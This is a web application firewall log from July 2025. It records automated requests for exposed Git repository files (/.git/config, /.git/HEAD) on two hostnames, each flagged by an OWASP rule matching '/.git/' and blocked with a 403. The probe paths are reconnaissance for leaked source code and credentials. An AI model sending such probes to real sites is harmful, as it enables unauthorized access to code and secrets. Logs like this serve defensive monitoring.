[Sat Jul 05 13:29:10.138557 2025] [:error] [pid 945017] [client 34.162.174.26:46168] [client 34.162.174.26] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGkMhgYPiW9TpyX8DsazGQAAAAM"]
[Sat Jul 05 13:29:10.138777 2025] [:error] [pid 945017] [client 34.162.174.26:46168] [client 34.162.174.26] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGkMhgYPiW9TpyX8DsazGQAAAAM"]
[Sat Jul 05 13:29:10.138961 2025] [:error] [pid 945017] [client 34.162.174.26:46168] [client 34.162.174.26] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGkMhgYPiW9TpyX8DsazGQAAAAM"]
[Sat Jul 05 13:45:42.147869 2025] [:error] [pid 945016] [client 34.162.181.244:36352] [client 34.162.181.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGkQZviyXSla7hMA2d6b-AAAAAI"]
[Sat Jul 05 13:45:42.148223 2025] [:error] [pid 945016] [client 34.162.181.244:36352] [client 34.162.181.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGkQZviyXSla7hMA2d6b-AAAAAI"]
[Sat Jul 05 13:45:42.148447 2025] [:error] [pid 945016] [client 34.162.181.244:36352] [client 34.162.181.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGkQZviyXSla7hMA2d6b-AAAAAI"]
[Sat Jul 05 13:45:42.258172 2025] [:error] [pid 945016] [client 34.162.181.244:36352] [client 34.162.181.244] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGkQZviyXSla7hMA2d6b-QAAAAI"]
[Sat Jul 05 13:45:42.258455 2025] [:error] [pid 945016] [client 34.162.181.244:36352] [client 34.162.181.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGkQZviyXSla7hMA2d6b-QAAAAI"]
[Sat Jul 05 13:45:42.258634 2025] [:error] [pid 945016] [client 34.162.181.244:36352] [client 34.162.181.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGkQZviyXSla7hMA2d6b-QAAAAI"]
[Sat Jul 05 14:29:38.061708 2025] [:error] [pid 945018] [client 34.162.67.247:40058] [client 34.162.67.247] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGkass-EaHfkH-3DQY4hzAAAAAQ"]
[Sat Jul 05 14:29:38.061940 2025] [:error] [pid 945018] [client 34.162.67.247:40058] [client 34.162.67.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGkass-EaHfkH-3DQY4hzAAAAAQ"]
[Sat Jul 05 14:29:38.062117 2025] [:error] [pid 945018] [client 34.162.67.247:40058] [client 34.162.67.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGkass-EaHfkH-3DQY4hzAAAAAQ"]
[Sat Jul 05 14:29:38.172137 2025] [:error] [pid 945018] [client 34.162.67.247:40058] [client 34.162.67.247] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGkass-EaHfkH-3DQY4hzQAAAAQ"]
[Sat Jul 05 14:29:38.172342 2025] [:error] [pid 945018] [client 34.162.67.247:40058] [client 34.162.67.247] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGkass-EaHfkH-3DQY4hzQAAAAQ"]
[Sat Jul 05 14:29:38.172515 2025] [:error] [pid 945018] [client 34.162.67.247:40058] [client 34.162.67.247] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGkass-EaHfkH-3DQY4hzQAAAAQ"]
[Sat Jul 05 15:13:44.074640 2025] [:error] [pid 945204] [client 34.162.148.146:34372] [client 34.162.148.146] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGklCJ30TDEiU-DmXzLZ-AAAAAY"]
[Sat Jul 05 15:13:44.074961 2025] [:error] [pid 945204] [client 34.162.148.146:34372] [client 34.162.148.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGklCJ30TDEiU-DmXzLZ-AAAAAY"]
[Sat Jul 05 15:13:44.075134 2025] [:error] [pid 945204] [client 34.162.148.146:34372] [client 34.162.148.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGklCJ30TDEiU-DmXzLZ-AAAAAY"]
[Sat Jul 05 15:13:44.184769 2025] [:error] [pid 945204] [client 34.162.148.146:34372] [client 34.162.148.146] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGklCJ30TDEiU-DmXzLZ-QAAAAY"]
[Sat Jul 05 15:13:44.184981 2025] [:error] [pid 945204] [client 34.162.148.146:34372] [client 34.162.148.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGklCJ30TDEiU-DmXzLZ-QAAAAY"]
[Sat Jul 05 15:13:44.185175 2025] [:error] [pid 945204] [client 34.162.148.146:34372] [client 34.162.148.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGklCJ30TDEiU-DmXzLZ-QAAAAY"]
[Sat Jul 05 18:44:40.548211 2025] [:error] [pid 951903] [client 34.162.66.7:52248] [client 34.162.66.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGlWeGrTi0ICHQeR-OKPhwAAAAc"]
[Sat Jul 05 18:44:40.548437 2025] [:error] [pid 951903] [client 34.162.66.7:52248] [client 34.162.66.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGlWeGrTi0ICHQeR-OKPhwAAAAc"]
[Sat Jul 05 18:44:40.548613 2025] [:error] [pid 951903] [client 34.162.66.7:52248] [client 34.162.66.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aGlWeGrTi0ICHQeR-OKPhwAAAAc"]
[Sat Jul 05 18:44:40.659401 2025] [:error] [pid 951903] [client 34.162.66.7:52248] [client 34.162.66.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGlWeGrTi0ICHQeR-OKPiAAAAAc"]
[Sat Jul 05 18:44:40.659623 2025] [:error] [pid 951903] [client 34.162.66.7:52248] [client 34.162.66.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGlWeGrTi0ICHQeR-OKPiAAAAAc"]
[Sat Jul 05 18:44:40.659810 2025] [:error] [pid 951903] [client 34.162.66.7:52248] [client 34.162.66.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/HEAD"] [unique_id "aGlWeGrTi0ICHQeR-OKPiAAAAAc"]
[Sat Jul 05 19:23:46.369360 2025] [:error] [pid 945020] [client 34.162.37.152:44442] [client 34.162.37.152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGlfonmYY6U6UiQyU3bCfQAAAAU"]
[Sat Jul 05 19:23:46.369612 2025] [:error] [pid 945020] [client 34.162.37.152:44442] [client 34.162.37.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGlfonmYY6U6UiQyU3bCfQAAAAU"]
[Sat Jul 05 19:23:46.369776 2025] [:error] [pid 945020] [client 34.162.37.152:44442] [client 34.162.37.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGlfonmYY6U6UiQyU3bCfQAAAAU"]
[Sat Jul 05 19:23:46.480077 2025] [:error] [pid 945020] [client 34.162.37.152:44442] [client 34.162.37.152] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGlfonmYY6U6UiQyU3bCfgAAAAU"]
[Sat Jul 05 19:23:46.480288 2025] [:error] [pid 945020] [client 34.162.37.152:44442] [client 34.162.37.152] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGlfonmYY6U6UiQyU3bCfgAAAAU"]
[Sat Jul 05 19:23:46.480453 2025] [:error] [pid 945020] [client 34.162.37.152:44442] [client 34.162.37.152] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGlfonmYY6U6UiQyU3bCfgAAAAU"]
[Sat Jul 05 21:08:10.889582 2025] [:error] [pid 951903] [client 34.162.55.126:33018] [client 34.162.55.126] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGl4GmrTi0ICHQeR-OKPjwAAAAc"]
[Sat Jul 05 21:08:10.889851 2025] [:error] [pid 951903] [client 34.162.55.126:33018] [client 34.162.55.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGl4GmrTi0ICHQeR-OKPjwAAAAc"]
[Sat Jul 05 21:08:10.890023 2025] [:error] [pid 951903] [client 34.162.55.126:33018] [client 34.162.55.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGl4GmrTi0ICHQeR-OKPjwAAAAc"]
[Sat Jul 05 21:08:10.999962 2025] [:error] [pid 951903] [client 34.162.55.126:33018] [client 34.162.55.126] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGl4GmrTi0ICHQeR-OKPkAAAAAc"]
[Sat Jul 05 21:08:11.000211 2025] [:error] [pid 951903] [client 34.162.55.126:33018] [client 34.162.55.126] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGl4GmrTi0ICHQeR-OKPkAAAAAc"]
[Sat Jul 05 21:08:11.000407 2025] [:error] [pid 951903] [client 34.162.55.126:33018] [client 34.162.55.126] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "aGl4GmrTi0ICHQeR-OKPkAAAAAc"]
[Sat Jul 05 22:19:32.997842 2025] [:error] [pid 945017] [client 34.162.91.162:55638] [client 34.162.91.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aGmI1AYPiW9TpyX8DsazOwAAAAM"]
